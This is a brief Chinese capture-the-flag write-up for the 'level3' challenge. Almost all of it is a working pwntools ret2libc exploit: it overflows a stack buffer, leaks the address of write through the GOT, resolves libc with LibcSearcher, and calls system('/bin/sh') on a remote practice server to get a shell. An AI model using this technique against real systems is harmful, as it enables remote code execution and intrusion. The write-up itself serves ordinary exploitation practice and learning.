保护
ida
没有system和/bin/sh,典型ret2libc
exp
from pwn import*
from LibcSearcher3 import*
context.log_level="debug"
elf=ELF("/home/error/桌面/level3")
#i=process("/home/error/桌面/level3")
i=remote("node4.buuoj.cn",27813)
print("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
write_plt=elf.plt["write"]
write_got=elf.got["write"]
main=elf.symbols["main"]
p1=cyclic(0x88+4)+flat([write_plt,main,1,write_got,4])#注意write的三个参数
i.sendlineafter("Input:\n",p1)
write_addr=u32(i.recv(4))
print(hex(write_addr))
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
sys_addr=libc_base+libc.dump("system")
sh_addr=libc_base+libc.dump("str_bin_sh")
p2=cyclic(0x88+4)+flat([sys_addr,0,sh_addr])
i.sendlineafter("Input:\n",p2)
i.interactive()
不知道为什么用libcsearcher远端和本地的libc版本不一样,本地打得通远端打不通,用了个libcsearcher3才打通远端